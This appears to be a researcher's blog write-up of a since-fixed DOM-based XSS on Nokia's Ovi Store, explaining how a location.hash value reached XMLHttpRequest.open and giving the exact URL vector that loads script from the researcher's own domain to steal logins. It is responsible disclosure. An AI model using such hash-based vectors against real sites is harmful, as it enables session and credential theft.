DOM Based XSS found at Nokia OVI Store Homepage

Post Pic Not Available

Vulnerability Type: Cross Site Scripting
Vulnerable Domain: http://store.ovi.com/
Status : Fixed

Detailed Writeup : Last year , i reported a critical DOM Based Cross Site Scrtiping Vulnerability on the hompeage of nokia Ovi Store http://store.ovi.com/ . The website uses CORS (Cross Origin Resource Sharing) mechanism to load the content in a particular area(div) of the page via XMLHttpRequests . So lets look on one of the url : http://store.ovi.com/#/applications?categoryId=14 The location of the content to be loaded in the particular div is in the url means "Location.hash" . I use Dominator often. Its a very useful tool . So, i fuzzed the url with Domi and i got something like this: 1 Alert whose source is location.hash and sink is XMLHR.open . Pretty nice :) . I opened the url in Google Chrome and in the console tab i get this: Tried to put some junk text just to know whats going on ? For example http://store.ovi.com/#/jasminder will result in the following. Since the sink was XMLHR.open , i tried to put my website after the hash. but.. The http request was still being made to http://store.ovi.com/jasminderapalsingh.info?fragment=1 which wont work obviously. I want the site to send XHR to be sent to jasminderpalsingh.info only. Then after doing some research i got to know about absolute URLs.Then i figured out a Classic vector which works with Chrome : http://store.ovi.com/#/\jasminderapalsingh.info and Perfect . I made it :) Now there was a dedicated XHR sent to my domain. After bypassing the Same origin policy . I could get the javascript executed on site.: This DOM Based XSS afftected the whole site . Below is the video POC of how i exploited this vulnerability to steal any user login details. Enjoy It :)
I got Nokia Lumia 820 as a reward for this vulnerability.
Thanks to the following people : https://twitter.com/kkotowicz
https://twitter.com/WisecWisec
https://twitter.com/netfuzzer

Share It!

Comments

comments powered by Disqus